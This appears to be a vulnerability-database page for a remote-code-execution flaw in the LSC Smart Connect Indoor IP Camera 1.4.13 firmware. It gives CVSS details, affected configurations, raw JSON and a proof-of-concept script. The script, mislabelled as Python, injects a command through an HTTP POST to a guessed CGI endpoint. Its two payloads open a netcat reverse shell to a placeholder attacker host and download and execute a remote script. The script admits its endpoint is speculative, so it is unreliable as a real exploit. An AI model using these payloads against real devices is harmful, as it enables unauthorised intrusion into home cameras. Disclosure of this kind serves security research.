Security Vulnerability Report
中文
CVE-2025-65817 CVSS 8.8 HIGH

CVE-2025-65817

Published: 2025-12-22 21:15:44
Last Modified: 2026-01-06 15:32:51

Description

LSC Smart Connect Indoor IP Camera 1.4.13 contains a RCE vulnerability in start_app.sh.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:lsc:smart_connect_indoor_ip_camera_firmware:1.4.13:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:lsc:smart_connect_indoor_ip_camera:-:*:*:*:*:*:*:* - NOT VULNERABLE
LSC Smart Connect Indoor IP Camera 1.4.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/bin/bash # CVE-2025-65817 PoC - LSC Smart Connect Indoor IP Camera RCE # Target: LSC Smart Connect Indoor IP Camera 1.4.13 # Attack Vector: Adjacent Network (AV:A) # Authentication: None Required (PR:N) # Please use this PoC only for authorized security testing TARGET_IP="$1" TARGET_PORT="${2:-80}" if [ -z "$TARGET_IP" ]; then echo "Usage: $0 <target_ip> [port]" echo "Example: $0 192.168.1.100 80" exit 1 fi echo "[*] CVE-2025-65817 PoC for LSC Smart Connect Indoor IP Camera" echo "[*] Target: $TARGET_IP:$TARGET_PORT" # Payload: Inject command to create a reverse shell backdoor # The actual exploitation depends on the specific vulnerable endpoint PAYLOAD="test; nc -e /bin/bash attacker_ip 4444;" # Alternative payload: Download and execute malicious script PAYLOAD_ALT="test; wget http://attacker_ip/malicious.sh -O /tmp/m.sh && chmod +x /tmp/m.sh && /tmp/m.sh;" echo "[!] Sending exploit payload..." echo "[!] If successful, you should receive a reverse shell on port 4444" # Method 1: HTTP request to potentially vulnerable endpoint curl -s -X POST "http://$TARGET_IP:$TARGET_PORT/cgi-bin/start_app.sh" \ -d "cmd=$PAYLOAD" \ -H "Content-Type: application/x-www-form-urlencoded" \ --connect-timeout 5 --max-time 10 # Method 2: Telnet/RTSP port exploitation (common on IP cameras) # echo "$PAYLOAD" | nc -w 3 $TARGET_IP 23 echo "" echo "[*] Exploitation attempt completed" echo "[*] Check for reverse shell connection on port 4444"

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65817", "sourceIdentifier": "[email protected]", "published": "2025-12-22T21:15:44.373", "lastModified": "2026-01-06T15:32:50.587", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LSC Smart Connect Indoor IP Camera 1.4.13 contains a RCE vulnerability in start_app.sh."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:lsc:smart_connect_indoor_ip_camera_firmware:1.4.13:*:*:*:*:*:*:*", "matchCriteriaId": "2ABF0F1D-D95C-4624-B5F1-2DC67A13D267"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:lsc:smart_connect_indoor_ip_camera:-:*:*:*:*:*:*:*", "matchCriteriaId": "C2C99467-FF9F-452E-8C5C-5308D6E5DB0F"}]}]}], "references": [{"url": "https://github.com/Istaarkk/CVE-2025-65817/blob/main/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/Istaarkk/CVE-2025-65817/blob/main/README.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}